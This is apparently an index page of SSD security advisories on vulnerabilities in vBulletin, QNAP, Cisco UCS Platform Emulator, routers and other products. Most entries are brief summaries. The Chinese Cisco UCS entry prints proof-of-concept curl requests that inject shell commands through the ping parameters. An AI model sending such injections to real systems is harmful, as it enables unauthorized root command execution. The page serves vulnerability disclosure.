Unauthenticated Action

SSD Advisory – vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion

Vulnerability Summary The following advisory describes a unauthenticated deserialization vulnerability that leads to arbitrary delete files and, under certain circumstances, code execution found in vBulletin version 5. vBulletin, also known as vB, is “a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many …

SSD Advisory – vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion Read More »

SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution

Vulnerability Summary The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5. vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites …

SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution Read More »

SSD Advisory – QNAP QTS Unauthenticated Remote Code Execution

Vulnerability Summary The following advisory describes a memory corruption vulnerability that can lead to an unauthenticated remote code execution in QNAP QTS versions 4.3.x and 4.2.x, including the 4.3.3.0299. QNAP Systems, Inc. “specializes in providing networked solutions for file sharing, virtualization, storage management and surveillance applications to address corporate, SMB, SOHO and home user needs. …

SSD Advisory – QNAP QTS Unauthenticated Remote Code Execution Read More »

SSD安全公告-Endian防火墙从存储型XSS到远程命令执行

漏洞概要 以下安全公告描述了在Endian防火墙5.0.3版本中存在的一个存储型XSS漏洞,成功利用该漏洞可造成远程代码执行。 Endian防火墙是一个“专注Linux安全的发行版本,,它是一个独立的,统一的安全管理操作系统。 Endian防火墙基于强化的Linux操作系统。” 漏洞提交者 一位独立的安全研究者向 Beyond Security 的 SSD 报告了该漏洞 厂商响应 厂商已经发布针对该漏洞的补丁。获取更多信息: https://help.endian.com/hc/en-us/articles/115012996087

SSD Advisory – Dasan Unauthenticated Remote Code Execution

Vulnerability Summary The following advisory describes a buffer overflow that leads to remote code execution found in Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 Dasan Networks GPON ONT WiFi Router “is indoor type ONT dedicated for FTTH (Fibre to the Home) or FTTP (Fiber to the Premises) deployments. That …

SSD Advisory – Dasan Unauthenticated Remote Code Execution Read More »

SSD Advisory – Coredy CX-E120 Repeater Multiple Vulnerabilities

Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Coredy CX-E120 Repeater. The Coredy CX-E120 WiFi Range Extender is “a network device with multifunction, which can be using for increasing the distance of a WiFi network by boosting the existing WiFi signal and enhancing the overall signal quality over long distances. An extender …

SSD Advisory – Coredy CX-E120 Repeater Multiple Vulnerabilities Read More »

SSD Advisory – ZTE ZXDSL Configuration Reset

Vulnerability Summary The following advisory describes a configuration reset vulnerability found in ZTE ZXDSL 831CII version 6.2. ZXDSL 831CII is “an ADSL access device to support multiple line modes. It supports ADSL2/ADSL2+ and is backward compatible to ADSL, even offers auto-negotiation capability for different flavors (G.dmt, T1.413 Issue 2) according to central office DSLAM’s settings …

SSD Advisory – ZTE ZXDSL Configuration Reset Read More »

SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution

Vulnerability Summary The following advisory describes a remote command execution vulnerability found in Synology StorageManager. Storage Manager is “a management application that helps you organize and monitor the storage capacity on your Synology NAS. Depending on the model and number of installed hard drives, Storage Manager helps you accomplish the following tasks: Create different types …

SSD Advisory – Synology StorageManager smart.cgi Remote Command Execution Read More »

SSD安全公告–Ikraus Anti Virus 远程代码执行漏洞

漏洞概要 以下安全公告描述了在Ikraus Anti Virus 2.16.7中发现的一个远程代码执行漏洞。 KARUS anti.virus“可以保护你的个人数据和PC免受各种恶意软件的入侵。此外,反垃圾邮件模块可以保护用户免受垃圾邮件和电子邮件中的恶意软件攻击。 选择获奖的IKARUS扫描引擎,可以有效保护自己免受网络犯罪分子的侵害。 IKARUS是世界上最好的扫描引擎,它每天都在检测未知和已知的威胁。 漏洞提交者 一位独立的安全研究人员向 Beyond Security 的 SSD 报告了该漏洞 厂商响应 更新一 CVE: CVE-2017-15643 厂商已经发布了这些漏洞的补丁。获取更多信息: https://www.ikarussecurity.com/about-ikarus/security-blog/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001/

SSD Advisory – Cambium Multiple Vulnerabilities

Vulnerabilities Summary The following advisory describes three (3) vulnerabilities found in Cambium Network Updater Tool and Networks Services Server. The Network Updater Tool is “a free-of-charge tool that applies packages to upgrade the device types that the release notes for the release that you are using list as supported. Because this tool is available, an …

SSD Advisory – Cambium Multiple Vulnerabilities Read More »

SSD Advisory – DblTek Multiple Vulnerabilities

Vulnerabilities summary The following advisory describes 2 (two) vulnerabilities found in DblTek webserver. DBL is “specialized in VoIP products, especially GoIPs. We design, develop, manufacture, and sell our products directly and via distributors to customers. Our GoIP models now cover 1, 4, 8, 16, and 32-channel in order to meet the wide range of market …

SSD Advisory – DblTek Multiple Vulnerabilities Read More »

SSD安全公告-思科UCS平台模拟器远程代

漏洞概要 以下安全公告描述了在思科UCS平台模拟器3.1(2ePE1)中发现的两个远程代码执行漏洞。 思科UCS平台模拟器是捆绑到虚拟机(VM)中的Cisco UCS Manager应用程序,VM包含模拟思科统一计算系统(Cisco UCS)硬件通信的软件,思科统一计算系统(Cisco UCS)硬件由思科UCS Manager配置和管理。 例如,你可以使用思科UCS平台模拟器来创建和测试支持的思科UCS配置,或者复制现有的思科UCS环境,以进行故障排除或开发。 在思科UCS平台模拟器中发现的漏洞是: 未经验证的远程代码执行漏洞 经认证的远程代码执行漏洞 一名独立的安全研究者向 Beyond Security 的 SSD 报告了该漏洞。 厂商响应 厂商已经发布了该漏洞的补丁,并发布以下CVE: CVE-2017-12243 漏洞详细信息 未经验证的远程代码执行漏洞 由于用户的输入在传递给IP/settings/ping函数时没有进行充分的过滤,导致未经身份验证的攻击者可以通过ping_NUM和ping_IP_ADDR参数注入命令,这些命令将在远程机器上以root身份执行。 漏洞证明 curl “http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#” curl -k “https://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#” curl “http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1” curl -k “https://IP/settings/ping?ping_num=1%3buname+-a%3b#&ping_ip_addr=127.0.0.1” 通过发送以上请求之一后,思科 UCS响应如下: /sample output/ ================ demo@kali:~/poc$ curl -k “http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#” PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: …

SSD安全公告-思科UCS平台模拟器远程代 Read More »

?

Get in touch